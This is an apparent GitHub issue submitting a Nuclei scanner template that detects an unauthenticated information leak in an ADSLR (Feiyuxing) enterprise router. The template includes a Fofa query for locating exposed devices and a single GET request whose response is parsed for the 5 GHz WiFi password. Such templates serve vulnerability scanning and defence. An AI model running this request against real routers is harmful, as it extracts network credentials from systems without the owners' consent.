### ISSUE TITLE
adslr router wifi info leak

### ISSUE THREAD

**Issue by SleepingBag945** [projectdiscovery/nuclei-templates#7960]
### Template Information:

adslr router wifi info leak
Fofa: title=="飞鱼星企业级智能上网行为管理系统"

### Nuclei Template:

```yaml
id: adslr-router-wifi-info-leak

info:
  name: adslr-router-wifi-info-leak
  author: SleepingBag945
  severity: medium
  description: |
    
  metadata:
    fofa-query: title="飞鱼星企业级智能上网行为管理系统"
  tags: infoleak

http:
  - raw:
      - |
        GET /request_para.cgi?parameter=wifi_get_5g_host  HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 200 && contains(body_1,"WPA-PSK")'
          - 'contains(body_1,"wl_passwd_5g")'
        condition: or

    extractors:
      - type: regex # type of the extractor
        part: body  # part of the response (header,body,all)
        group: 1
        regex:
          - "\"wl_passwd_5g\":\"(.*?)\""  # regex to use for extraction.

```
